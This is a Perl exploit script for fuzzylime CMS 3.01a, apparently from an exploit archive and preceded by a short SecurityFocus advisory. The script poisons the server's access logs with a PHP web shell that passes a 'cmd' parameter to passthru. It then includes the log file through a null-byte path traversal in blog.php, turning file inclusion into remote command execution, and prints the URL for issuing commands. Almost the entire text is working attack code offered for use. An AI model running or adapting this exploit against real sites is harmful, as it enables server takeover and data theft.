41 lines
No EOL
1.7 KiB
Perl
Executable file
41 lines
No EOL
1.7 KiB
Perl
Executable file
source: http://www.securityfocus.com/bid/30121/info
|
|
|
|
'fuzzylime (cms)' is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
|
|
|
|
An attacker can exploit this issue to execute arbitrary local script code. This can allow the attacker to obtain sensitive information that may aid in further attacks.
|
|
|
|
This issue affects fuzzylime (cms) 3.01a; other versions may also be affected.
|
|
|
|
#!/usr/bin/perl
|
|
# Fuzzylime CMS 3.01 LFI / RCE
|
|
# author : Cod3rZ
|
|
# website : http://cod3rz.helloweb.eu
|
|
#
|
|
# http://[site]/blog.php?file=../[file]\0
|
|
# LFI TO RCE
|
|
use LWP::UserAgent;
|
|
system("cls");
|
|
#system("clear");
|
|
print " -------------------------------------------------\n";
|
|
print " Fuzzylime CMS 3.01 LFI / RCE \n";
|
|
print " Powered by Cod3rZ \n";
|
|
print " http://cod3rz.helloweb.eu \n";
|
|
print " -------------------------------------------------\n";
|
|
print " Insert Site (http://site.com/): \n ";
|
|
chomp($site = <STDIN>);
|
|
print " -------------------------------------------------\n";
|
|
print " Insert Logs path \n ";
|
|
chomp($path = <STDIN>);
|
|
print " -------------------------------------------------\n";
|
|
|
|
#Infect Logs
|
|
$lwp = LWP::UserAgent->new;
|
|
$siten = $site.'/blog.php?file=';
|
|
$ua = $lwp->get($site.'coderz <?php passthru(stripslashes($_GET[cmd])); ?> /coderz');
|
|
#Control
|
|
$ua = $lwp->get($site.$path.'%00');
|
|
if($ua->content =~ m/cod3rz/) {
|
|
print " Ok ".$site." is infected \n";
|
|
print " -------------------------------------------------\n";
|
|
print " ".$siten.$path."&cmd=[command]\\0 \n";
|
|
print " -- |